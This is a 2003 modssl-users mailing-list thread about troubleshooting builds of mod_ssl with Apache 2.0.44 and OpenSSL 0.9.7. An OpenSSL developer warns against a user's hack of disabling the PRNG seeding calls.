Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boulytchev, Vasiliy" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

yes, I am positive, actually the clients that use FP extensions are =
positive, I am negative, but who listens to me these days.........

hehe

-----Original Message-----
From: R. DuFresne [mailto:dufresne@sysinfo.com]
Sent: Friday, February 07, 2003 9:46 AM
To: modssl-users@modssl.org
Subject: RE: Problems compiling mod_ssl with apache 2.0.44


are you sure you wish to degrade the security of your apache  server =
with
front[age extensions?  Frontpage and coldfusion have a nasty security
history.


Thanks,

Ron DuFresne


On Fri, 7 Feb 2003, Boulytchev, Vasiliy wrote:

> This is off the modssl track, but has anyone gotten frontpage =
extensions working for httpd-2.0.44?   2.0.40 is the supported version, =
and the install quits if that is not it.  Just checking....  =20
>=20
>=20
> -----Original Message-----
> From: Sasa STUPAR [mailto:sasa@stupar.homelinux.net]
> Sent: Friday, February 07, 2003 2:39 AM
> To: modssl-users@modssl.org
> Subject: Re: Problems compiling mod_ssl with apache 2.0.44
>=20
>=20
> I have just succesfully compiled apache 2.0.44 with mod_ssl and =
openssl
> 0.9.7 on RH8. First I have compiled openssl then apache and everything
> works fine. On trick after make install in openssl it doesn't copy
> headers so you have to manually copy them to your install directory.
>=20
> On 2/7/2003 10:25 AM, Erik Melkersson a =E9crit:
> > Hi!
> >=20
> > Thanks for the reply.
> >=20
> > Geoff Thorpe wrote:
> >> ... The kind of linker
> >> error you report usually suggests the code was compiled against one
> >> openssl version's headers, but is trying to link against a =
different
> >> openssl version's libraries....
> >=20
> > Yes, I tried to compile it against different openssl-version and =
didn't=20
> > make clean in betweend (dumb fault by me)
> >=20
> > After cleaning and compiling again we get some other errors.
> > undefined reference to OPENSSL_free, RAND_egd and RAND_status (se =
below=20
> > for complete data)
> >=20
> > In order to make apache compile we
> > - changed OPENSSL_free to CRYPTO_free in a #define in the =
modules/ssl/=20
> > headers file. (As that is done in openssl anyway)
> > - commented out the 3+3 lines where RAND_egd and RAND_status are =
used in=20
> > modules/ssl/ssl_engine_rand.c
> >=20
> > Now we can compile and use it over ssl even though commenting out =
non=20
> > working code is propably a bad thing to do.
> >=20
> >=20
> > ./configure --prefix=3D/service/apache2=20
> > --exec-prefix=3D/service/apache2/arch/linux-intel --enable-ssl=20
> > --with-openssl=3D/service/apache2/openssl/
> > ...lots of rows...
> > make
> > ...lots of rows...
> > /bin/sh =
/usr/local/service/apache2/src/httpd-2.0.44/srclib/apr/libtool=20
> > --mode=3Dlink gcc  -g -O2 -pthread    -DLINUX=3D2 -D_REENTRANT=20
> > -D_XOPEN_SOURCE=3D500 -D_BSD_SOURCE -D_SVID_SOURCE=20
> > -DAP_HAVE_DESIGNATED_INITIALIZER=20
> > -I/usr/local/service/apache2/src/httpd-2.0.44/srclib/apr/include=20
> > =
-I/usr/local/service/apache2/src/httpd-2.0.44/srclib/apr-util/include=20
> > -I/service/apache2/openssl/include=20
> > =
-I/usr/local/service/apache2/src/httpd-2.0.44/srclib/apr-util/xml/expat/l=
ib=20
> > -I. -I/usr/local/service/apache2/src/httpd-2.0.44/os/unix=20
> > -I/usr/local/service/apache2/src/httpd-2.0.44/server/mpm/prefork=20
> > -I/usr/local/service/apache2/src/httpd-2.0.44/modules/http=20
> > -I/usr/local/service/apache2/src/httpd-2.0.44/modules/filters=20
> > -I/usr/local/service/apache2/src/httpd-2.0.44/modules/proxy=20
> > -I/usr/local/service/apache2/src/httpd-2.0.44/include=20
> > -I/usr/local/ssl/include/openssl -I/usr/local/ssl/include=20
> > -I/usr/local/service/apache2/src/httpd-2.0.44/modules/dav/main=20
> > -export-dynamic=20
> > =
-L/usr/local/service/apache2/src/httpd-2.0.44/srclib/apr-util/xml/expat/l=
ib=20
> > -L/usr/local/ssl/lib   -o httpd  modules.lo  =
modules/aaa/mod_access.la=20
> > modules/aaa/mod_auth.la modules/filters/mod_include.la=20
> > modules/loggers/mod_log_config.la modules/metadata/mod_env.la=20
> > modules/metadata/mod_setenvif.la modules/ssl/mod_ssl.la=20
> > modules/http/mod_http.la modules/http/mod_mime.la=20
> > modules/generators/mod_status.la modules/generators/mod_autoindex.la =

> > modules/generators/mod_asis.la modules/generators/mod_cgi.la=20
> > modules/mappers/mod_negotiation.la modules/mappers/mod_dir.la=20
> > modules/mappers/mod_imap.la modules/mappers/mod_actions.la=20
> > modules/mappers/mod_userdir.la modules/mappers/mod_alias.la=20
> > modules/mappers/mod_so.la server/mpm/prefork/libprefork.la=20
> > server/libmain.la os/unix/libos.la -lssl -lcrypto=20
> > /usr/local/service/apache2/src/httpd-2.0.44/srclib/pcre/libpcre.la=20
> > =
/usr/local/service/apache2/src/httpd-2.0.44/srclib/apr-util/libaprutil-0.=
la=20
> > -lgdbm -ldb=20
> > =
/usr/local/service/apache2/src/httpd-2.0.44/srclib/apr-util/xml/expat/lib=
/libexpat.la=20
> > /usr/local/service/apache2/src/httpd-2.0.44/srclib/apr/libapr-0.la =
-lm=20
> > -lcrypt -lnsl -lresolv -ldl
> > modules/ssl/.libs/mod_ssl.al(ssl_engine_kernel.lo): In function=20
> > `ssl_hook_UserCheck':
> > =
/usr/local/service/apache2/src/httpd-2.0.44/modules/ssl/ssl_engine_kernel=
.c:875:=20
> > undefined reference to `OPENSSL_free'
> > modules/ssl/.libs/mod_ssl.al(ssl_engine_kernel.lo): In function=20
> > `ssl_callback_SSLVerify':
> > =
/usr/local/service/apache2/src/httpd-2.0.44/modules/ssl/ssl_engine_kernel=
.c:1206:=20
> > undefined reference to `OPENSSL_free'
> > =
/usr/local/service/apache2/src/httpd-2.0.44/modules/ssl/ssl_engine_kernel=
.c:1210:=20
> > undefined reference to `OPENSSL_free'
> > modules/ssl/.libs/mod_ssl.al(ssl_engine_kernel.lo): In function=20
> > `ssl_callback_SSLVerify_CRL':
> > =
/usr/local/service/apache2/src/httpd-2.0.44/modules/ssl/ssl_engine_kernel=
.c:1469:=20
> > undefined reference to `OPENSSL_free'
> > modules/ssl/.libs/mod_ssl.al(ssl_engine_kernel.lo): In function=20
> > `modssl_proxy_info_log':
> > =
/usr/local/service/apache2/src/httpd-2.0.44/modules/ssl/ssl_engine_kernel=
.c:1507:=20
> > undefined reference to `OPENSSL_free'
> > modules/ssl/.libs/mod_ssl.al(ssl_engine_rand.lo): In function=20
> > `ssl_rand_seed':
> > =
/usr/local/service/apache2/src/httpd-2.0.44/modules/ssl/ssl_engine_rand.c=
:125:=20
> > undefined reference to `RAND_egd'
> > =
/usr/local/service/apache2/src/httpd-2.0.44/modules/ssl/ssl_engine_rand.c=
:163:=20
> > undefined reference to `RAND_status'
> > modules/ssl/.libs/mod_ssl.al(ssl_engine_vars.lo): In function=20
> > `ssl_var_lookup_ssl_cert':
> > =
/usr/local/service/apache2/src/httpd-2.0.44/modules/ssl/ssl_engine_vars.c=
:351:=20
> > undefined reference to `OPENSSL_free'
> >=20
> > Machine running Linux 2.2.17-14smp (RedHat 6.2)
> > openssl 0.9.7
> > apache 2.0.44
> >=20
>=20
>=20
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>=20

--=20
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Feb  7 19:14:54 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 2263A2AA0A3; Fri,  7 Feb 2003 19:14:54 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from VL-MS-MR001.sc1.videotron.ca (relais.videotron.ca [24.201.245.36])
	by master.modssl.org (Postfix) with ESMTP id 9B0462AA065
	for ; Fri,  7 Feb 2003 19:14:52 +0100 (CET)
Received: from steerpike.geoffthorpe.net ([24.203.229.101])
 by VL-MS-MR001.sc1.videotron.ca
 (iPlanet Messaging Server 5.2 HotFix 1.10 (built Jan 23 2003))
 with SMTP id <0H9Y0051DAOLEZ@VL-MS-MR001.sc1.videotron.ca> for
 modssl-users@modssl.org; Fri, 07 Feb 2003 13:14:46 -0500 (EST)
Received: by steerpike.geoffthorpe.net (sSMTP sendmail emulation); Fri,
 07 Feb 2003 13:14:31 -0500
Date: Fri, 07 Feb 2003 13:14:31 -0500
From: Geoff Thorpe 
Subject: Re: Problems compiling mod_ssl with apache 2.0.44
In-reply-to: <3E437B9F.5090208@unit.liu.se>
To: modssl-users@modssl.org
Message-id: <20030207181431.GA1847@grumpy.geoffnet>
X-Info: http://www.geoffthorpe.net
MIME-version: 1.0
Content-type: text/plain; charset=us-ascii
Content-transfer-encoding: 7BIT
Content-disposition: inline
User-Agent: Mutt/1.4i
X-Editor: Vim http://www.vim.org/
References: <3E422196.40803@unit.liu.se>
 <20030206191825.GC1848@grumpy.geoffnet> <3E437B9F.5090208@unit.liu.se>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Geoff Thorpe 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello,

* Erik Melkersson (melker@unit.liu.se) wrote:
> Geoff Thorpe wrote:
> >... The kind of linker
> >error you report usually suggests the code was compiled against one
> >openssl version's headers, but is trying to link against a different
> >openssl version's libraries....
> 
> Yes, I tried to compile it against different openssl-version and didn't 
> make clean in betweend (dumb fault by me)

Ah, that would've helped :-)

> After cleaning and compiling again we get some other errors.
> undefined reference to OPENSSL_free, RAND_egd and RAND_status (se below 
> for complete data)

Erm ...

> In order to make apache compile we
> - changed OPENSSL_free to CRYPTO_free in a #define in the modules/ssl/ 
> headers file. (As that is done in openssl anyway)
> - commented out the 3+3 lines where RAND_egd and RAND_status are used in 
> modules/ssl/ssl_engine_rand.c

None of this should be required if you are compiling against a matching
set of openssl headers and libraries. I suggest for your own benefit
that you get to the bottom of the problem rather than using the tricks
you have - it is known (and in fact reiterated time after time by myself
and other openssl developers) that no binary compatibility should be
assumed from one openssl release to the next until at least version 1.0.
So if you've had to hack to get past the linker stage, and you're so far
lucky enough to have the basic functionality "ok" at run-time without
any noticable explosions, you could still be sitting on a behavioural
time-bomb.

BTW: What you've done w.r.t. RAND_*** functions could cause your server
to either (a) fail handshakes with certain client browsers due to PRNG
problems, or worse (b) appear to negotiate fine with everyone despite
using insecure parameters. Which of those risks is greater rather
depends on how you've hacked apache2's code, but either way it shouldn't
be required if your build environment (and openssl installation) is ok.

> Now we can compile and use it over ssl even though commenting out non 
> working code is propably a bad thing to do.

It is, and it could bite you in unknown ways later on. I'd recommend
figuring out why you had to do the things you did to get apache working
- it should be very straightforward and require no such hacking.

Cheers,
Geoff

-- 
Geoff Thorpe
geoff@geoffthorpe.net
http://www.geoffthorpe.net/

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Feb  7 19:19:14 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 784532AA0A3; Fri,  7 Feb 2003 19:19:14 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from VL-MS-MR001.sc1.videotron.ca (relais.videotron.ca [24.201.245.36])
	by master.modssl.org (Postfix) with ESMTP id 6B7422AA065
	for ; Fri,  7 Feb 2003 19:19:11 +0100 (CET)
Received: from steerpike.geoffthorpe.net ([24.203.229.101])
 by VL-MS-MR001.sc1.videotron.ca
 (iPlanet Messaging Server 5.2 HotFix 1.10 (built Jan 23 2003))
 with SMTP id <0H9Y001B5ATXFY@VL-MS-MR001.sc1.videotron.ca> for
 modssl-users@modssl.org; Fri, 07 Feb 2003 13:17:58 -0500 (EST)
Received: by steerpike.geoffthorpe.net (sSMTP sendmail emulation); Fri,
 07 Feb 2003 13:17:43 -0500
Date: Fri, 07 Feb 2003 13:17:43 -0500
From: Geoff Thorpe 
Subject: Re: Problems compiling mod_ssl with apache 2.0.44
In-reply-to: <3E437E9F.6000209@stupar.homelinux.net>
To: modssl-users@modssl.org
Message-id: <20030207181743.GB1847@grumpy.geoffnet>
X-Info: http://www.geoffthorpe.net
MIME-version: 1.0
Content-type: text/plain; charset=us-ascii
Content-transfer-encoding: 7BIT
Content-disposition: inline
User-Agent: Mutt/1.4i
X-Editor: Vim http://www.vim.org/
References: <3E422196.40803@unit.liu.se>
 <20030206191825.GC1848@grumpy.geoffnet> <3E437B9F.5090208@unit.liu.se>
 <3E437E9F.6000209@stupar.homelinux.net>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Geoff Thorpe 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

* Sasa STUPAR (sasa@stupar.homelinux.net) wrote:
> I have just succesfully compiled apache 2.0.44 with mod_ssl and openssl
> 0.9.7 on RH8. First I have compiled openssl then apache and everything
> works fine. On trick after make install in openssl it doesn't copy
> headers so you have to manually copy them to your install directory.

It doesn't? It certainly should - can you please double-check this and
report the details to me if it's true? Noone (to my knowledge) has
reported this problem and openssl 0.9.7 has been through a fairly
extensive beta testing period (during which the header installation
didn't AFAICS require any hacking).

Cheers,
Geoff

-- 
Geoff Thorpe
geoff@geoffthorpe.net
http://www.geoffthorpe.net/

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Feb  7 19:59:27 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 50BBD2AA0A3; Fri,  7 Feb 2003 19:59:27 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from malecot.homelinux.net (cmb3-218.dial-up.arnes.si [194.249.40.218])
	by master.modssl.org (Postfix) with ESMTP id 702B52AA065
	for ; Fri,  7 Feb 2003 19:59:21 +0100 (CET)
X-AuthUser: sasa@stupar.homelinux.net
Received: from stupar.homelinux.net (192.168.10.1)
	by malecot.homelinux.net (192.168.10.10) with [XMail 1.12 (Linux/Ix86) ESMTP Server]
	id  for  from ;
	Fri, 07 Feb 2003 19:59:26 +0100
Message-ID: <3E44020E.70901@stupar.homelinux.net>
Date: Fri, 07 Feb 2003 19:59:26 +0100
From: Sasa STUPAR 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; fr-FR; rv:1.0.2) Gecko/20021120 Netscape/7.01 (Compact)
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Problems compiling mod_ssl with apache 2.0.44
References: <3E422196.40803@unit.liu.se> <20030206191825.GC1848@grumpy.geoffnet> <3E437B9F.5090208@unit.liu.se> <3E437E9F.6000209@stupar.homelinux.net> <20030207181743.GB1847@grumpy.geoffnet>
Content-Type: multipart/signed; protocol="application/x-pkcs7-signature"; micalg=sha1; boundary="------------ms040300000500010807040308"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Sasa STUPAR 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a cryptographically signed message in MIME format.

--------------ms040300000500010807040308
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit

No, It doesn't. I have compiled it with prefix /usr/include and
openssldir /usr/include/openssl and there are no headers. I haven't
noticed it on first but when I wanted to compile apache with mod_ssl it
returns an error that it was unable to find headers for ssl.
Is there someone else reporting the same problem ? Maybe is this related
to the RedHat8 distrubution only.

Sasa

On 2/7/2003 7:17 PM, Geoff Thorpe a écrit:
> * Sasa STUPAR (sasa@stupar.homelinux.net) wrote:
>> I have just succesfully compiled apache 2.0.44 with mod_ssl and openssl
>> 0.9.7 on RH8. First I have compiled openssl then apache and everything
>> works fine. On trick after make install in openssl it doesn't copy
>> headers so you have to manually copy them to your install directory.
> 
> It doesn't? It certainly should - can you please double-check this and
> report the details to me if it's true? Noone (to my knowledge) has
> reported this problem and openssl 0.9.7 has been through a fairly
> extensive beta testing period (during which the header installation
> didn't AFAICS require any hacking).
> 
> Cheers,
> Geoff
> 


--------------ms040300000500010807040308
Content-Type: application/x-pkcs7-signature; name="smime.p7s"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="smime.p7s"
Content-Description: S/MIME Cryptographic Signature

MIAGCSqGSIb3DQEHAqCAMIACAQExCzAJBgUrDgMCGgUAMIAGCSqGSIb3DQEHAQAAoIIEzjCC
AmMwggHMAgECMA0GCSqGSIb3DQEBBAUAMIGBMQswCQYDVQQGEwJTSTERMA8GA1UECBMIU2xv
dmVuaWExEDAOBgNVBAcTB01hcmlib3IxHTAbBgNVBAMTFHN0dXBhci5ob21lbGludXgubmV0
MS4wLAYJKoZIhvcNAQkBFh9wb3N0bWFzdGVyQHN0dXBhci5ob21lbGludXgubmV0MB4XDTAy
MTIxMjExMzY0OVoXDTAzMTIxMjExMzY0OVowcjELMAkGA1UEBhMCU0kxETAPBgNVBAgTCFNs
b3ZlbmlhMRAwDgYDVQQHEwdNYXJpYm9yMRQwEgYDVQQDEwtTYXNhIFNUVVBBUjEoMCYGCSqG
SIb3DQEJARYZc2FzYUBzdHVwYXIuaG9tZWxpbnV4Lm5ldDCBnzANBgkqhkiG9w0BAQEFAAOB
jQAwgYkCgYEAuPDzDL2oxWDqfSyIGvjH7JQTcF+Dn6tM6O2D4IGrgQK2MfAJXcd+AaMlwyGq
P3sND4BNo5mgsz7XyTjddvfRaste6UIUDnsbNlUQI+GApPHAoeiBTt7rWbkSYsllVPn3nS1t
indhZIiKWSbDfTRAOxz9Vk1dwmj9L7LoB8WcZ7MCAwEAATANBgkqhkiG9w0BAQQFAAOBgQBz
4fyueMI3+ORCD61BQid7JvCdCVpj7MF4lf4zh+WQpP7klV3/+8OMkLA3TK8EvDoLNeFKgbZZ
STSV6cUGuscfESGn9Kq0M9OMyNFFc/IR2qGgsohEZLa5EScodGUfOJzPlg1KNqXXaV3Aomyq
3WhJ07a2c9kwXpy/flFLlUmccDCCAmMwggHMAgECMA0GCSqGSIb3DQEBBAUAMIGBMQswCQYD
VQQGEwJTSTERMA8GA1UECBMIU2xvdmVuaWExEDAOBgNVBAcTB01hcmlib3IxHTAbBgNVBAMT
FHN0dXBhci5ob21lbGludXgubmV0MS4wLAYJKoZIhvcNAQkBFh9wb3N0bWFzdGVyQHN0dXBh
ci5ob21lbGludXgubmV0MB4XDTAyMTIxMjExMzY0OVoXDTAzMTIxMjExMzY0OVowcjELMAkG
A1UEBhMCU0kxETAPBgNVBAgTCFNsb3ZlbmlhMRAwDgYDVQQHEwdNYXJpYm9yMRQwEgYDVQQD
EwtTYXNhIFNUVVBBUjEoMCYGCSqGSIb3DQEJARYZc2FzYUBzdHVwYXIuaG9tZWxpbnV4Lm5l
dDCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEAuPDzDL2oxWDqfSyIGvjH7JQTcF+Dn6tM
6O2D4IGrgQK2MfAJXcd+AaMlwyGqP3sND4BNo5mgsz7XyTjddvfRaste6UIUDnsbNlUQI+GA
pPHAoeiBTt7rWbkSYsllVPn3nS1tindhZIiKWSbDfTRAOxz9Vk1dwmj9L7LoB8WcZ7MCAwEA
ATANBgkqhkiG9w0BAQQFAAOBgQBz4fyueMI3+ORCD61BQid7JvCdCVpj7MF4lf4zh+WQpP7k
lV3/+8OMkLA3TK8EvDoLNeFKgbZZSTSV6cUGuscfESGn9Kq0M9OMyNFFc/IR2qGgsohEZLa5
EScodGUfOJzPlg1KNqXXaV3Aomyq3WhJ07a2c9kwXpy/flFLlUmccDGCAoAwggJ8AgEBMIGH
MIGBMQswCQYDVQQGEwJTSTERMA8GA1UECBMIU2xvdmVuaWExEDAOBgNVBAcTB01hcmlib3Ix
HTAbBgNVBAMTFHN0dXBhci5ob21lbGludXgubmV0MS4wLAYJKoZIhvcNAQkBFh9wb3N0bWFz
dGVyQHN0dXBhci5ob21lbGludXgubmV0AgECMAkGBSsOAwIaBQCgggFOMBgGCSqGSIb3DQEJ
AzELBgkqhkiG9w0BBwEwHAYJKoZIhvcNAQkFMQ8XDTAzMDIwNzE4NTkyNlowIwYJKoZIhvcN
AQkEMRYEFMqWrpf8aR7Iv5jj1bawluFYM9r7MFIGCSqGSIb3DQEJDzFFMEMwCgYIKoZIhvcN
AwcwDgYIKoZIhvcNAwICAgCAMA0GCCqGSIb3DQMCAgFAMAcGBSsOAwIHMA0GCCqGSIb3DQMC
AgEoMIGaBgsqhkiG9w0BCRACCzGBiqCBhzCBgTELMAkGA1UEBhMCU0kxETAPBgNVBAgTCFNs
b3ZlbmlhMRAwDgYDVQQHEwdNYXJpYm9yMR0wGwYDVQQDExRzdHVwYXIuaG9tZWxpbnV4Lm5l
dDEuMCwGCSqGSIb3DQEJARYfcG9zdG1hc3RlckBzdHVwYXIuaG9tZWxpbnV4Lm5ldAIBAjAN
BgkqhkiG9w0BAQEFAASBgB7TxmF5vQPgCfL14BhwuA3xqPE9czXIKndtHppWFQ/1rWHW4mDJ
x2/33rfjGAuXFf0F9kSXYhi5tiBoYbacyKnMQJo8EoVA/MPKDwnjtLGE2TD0PIF80XCn4MP6
cFPqj3W4CsRU1tyGHmDJofW/NP70P2KqallZ/XahErGrVGrnAAAAAAAA
--------------ms040300000500010807040308--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Feb  7 20:51:49 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 1F49F2AA0A3; Fri,  7 Feb 2003 20:51:49 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from mail.coinfotech.com (mail.coinfotech.com [209.12.32.66])
	by master.modssl.org (Postfix) with ESMTP id 19EC92AA065
	for ; Fri,  7 Feb 2003 20:51:47 +0100 (CET)
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Subject: RE: Problems compiling mod_ssl with apache 2.0.44
X-MimeOLE: Produced By Microsoft Exchange V6.0.6249.0
Content-Class: urn:content-classes:message
Date: Fri, 7 Feb 2003 12:51:45 -0700
Message-ID: <689DEB27979E3243A92D723D72CD6B3D022C80@maple.office.coinfotech.com>
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: Problems compiling mod_ssl with apache 2.0.44
Thread-Index: AcLO2xYeGBI5EgS9RsmoqnSxthlWlAAByjMw
From: "Boulytchev, Vasiliy" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boulytchev, Vasiliy" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I walked around the setups, and it works beautifully,  the only thing I =
changed was the ./configure script in /usr/src/apache.blah/ to look in =
the correct folders for my ssl stuff. =20

-----Original Message-----
From: Sasa STUPAR [mailto:sasa@stupar.homelinux.net]
Sent: Friday, February 07, 2003 11:59 AM
To: modssl-users@modssl.org
Subject: Re: Problems compiling mod_ssl with apache 2.0.44


No, It doesn't. I have compiled it with prefix /usr/include and
openssldir /usr/include/openssl and there are no headers. I haven't
noticed it on first but when I wanted to compile apache with mod_ssl it
returns an error that it was unable to find headers for ssl.
Is there someone else reporting the same problem ? Maybe is this related
to the RedHat8 distrubution only.

Sasa

On 2/7/2003 7:17 PM, Geoff Thorpe a =E9crit:
> * Sasa STUPAR (sasa@stupar.homelinux.net) wrote:
>> I have just succesfully compiled apache 2.0.44 with mod_ssl and =
openssl
>> 0.9.7 on RH8. First I have compiled openssl then apache and =
everything
>> works fine. On trick after make install in openssl it doesn't copy
>> headers so you have to manually copy them to your install directory.
>=20
> It doesn't? It certainly should - can you please double-check this and
> report the details to me if it's true? Noone (to my knowledge) has
> reported this problem and openssl 0.9.7 has been through a fairly
> extensive beta testing period (during which the header installation
> didn't AFAICS require any hacking).
>=20
> Cheers,
> Geoff
>=20

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Feb  8 00:48:42 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 42DB32AA0A7; Sat,  8 Feb 2003 00:48:42 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from VL-MS-MR002.sc1.videotron.ca (relais.videotron.ca [24.201.245.36])
	by master.modssl.org (Postfix) with ESMTP id 595562AA087
	for ; Sat,  8 Feb 2003 00:48:35 +0100 (CET)
Received: from steerpike.geoffthorpe.net ([24.203.229.101])
 by VL-MS-MR002.sc1.videotron.ca
 (iPlanet Messaging Server 5.2 HotFix 1.10 (built Jan 23 2003))
 with SMTP id <0H9Y004QNQ4888@VL-MS-MR002.sc1.videotron.ca> for
 modssl-users@modssl.org; Fri, 07 Feb 2003 18:48:10 -0500 (EST)
Received: by steerpike.geoffthorpe.net (sSMTP sendmail emulation); Fri,
 07 Feb 2003 18:48:07 -0500
Date: Fri, 07 Feb 2003 18:48:07 -0500
From: Geoff Thorpe 
Subject: Re: Problems compiling mod_ssl with apache 2.0.44
In-reply-to: <3E44020E.70901@stupar.homelinux.net>
To: modssl-users@modssl.org
Message-id: <20030207234807.GA3189@grumpy.geoffnet>
X-Info: http://www.geoffthorpe.net
MIME-version: 1.0
Content-type: text/plain; charset=us-ascii
Content-transfer-encoding: 7BIT
Content-disposition: inline
User-Agent: Mutt/1.4i
X-Editor: Vim http://www.vim.org/
References: <3E422196.40803@unit.liu.se>
 <20030206191825.GC1848@grumpy.geoffnet> <3E437B9F.5090208@unit.liu.se>
 <3E437E9F.6000209@stupar.homelinux.net>
 <20030207181743.GB1847@grumpy.geoffnet> <3E44020E.70901@stupar.homelinux.net>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Geoff Thorpe 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

* Sasa STUPAR (sasa@stupar.homelinux.net) wrote:
> No, It doesn't. I have compiled it with prefix /usr/include and
> openssldir /usr/include/openssl and there are no headers. I haven't
> noticed it on first but when I wanted to compile apache with mod_ssl it
> returns an error that it was unable to find headers for ssl.
> Is there someone else reporting the same problem ? Maybe is this related
> to the RedHat8 distrubution only.

Well RH8 has openssl bundled though probably not with the headers, and I
can't say much else about what RH might be doing because I don't use it.
However, trying to install to a prefix of /usr/include would be pretty
terrible - as it will install all binaries, libraries, and include files
in *sub-directories* of /usr/include! Are you sure you did this, or did
you mean /usr/local?

Anyway, I'd be interested to see a log of this problem if you wouldn't
mind? If there's an openssl bug inside it, I'll try and get it
identified and fixed for the next release (0.9.7a). Eg. could you please
repeat your steps and send me the logs as;
  # ./config [...] 1> c1.log 2> c2.log
  # make [...] 1> m1.log 2> m2.log
  # make install 1> i1.log 2> i2.log
or something like that?

Cheers,
Geoff

-- 
Geoff Thorpe
geoff@geoffthorpe.net
http://www.geoffthorpe.net/

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Feb  8 10:16:21 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 78AF32AA0A7; Sat,  8 Feb 2003 10:16:21 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from malecot.homelinux.net (cmb3-218.dial-up.arnes.si [194.249.40.218])
	by master.modssl.org (Postfix) with ESMTP id C91972AA087
	for ; Sat,  8 Feb 2003 10:16:15 +0100 (CET)
X-AuthUser: sasa@stupar.homelinux.net
Received: from stupar.homelinux.net (192.168.10.1)
	by malecot.homelinux.net (192.168.10.10) with [XMail 1.12 (Linux/Ix86) ESMTP Server]
	id  for  from ;
	Sat, 08 Feb 2003 10:16:23 +0100
Message-ID: <3E44CAE5.1020700@stupar.homelinux.net>
Date: Sat, 08 Feb 2003 10:16:21 +0100
From: Sasa STUPAR 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; fr-FR; rv:1.0.2) Gecko/20021120 Netscape/7.01 (Compact)
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Problems compiling mod_ssl with apache 2.0.44
References: <3E422196.40803@unit.liu.se> <20030206191825.GC1848@grumpy.geoffnet> <3E437B9F.5090208@unit.liu.se> <3E437E9F.6000209@stupar.homelinux.net> <20030207181743.GB1847@grumpy.geoffnet> <3E44020E.70901@stupar.homelinux.net> <20030207234807.GA3189@grumpy.geoffnet>
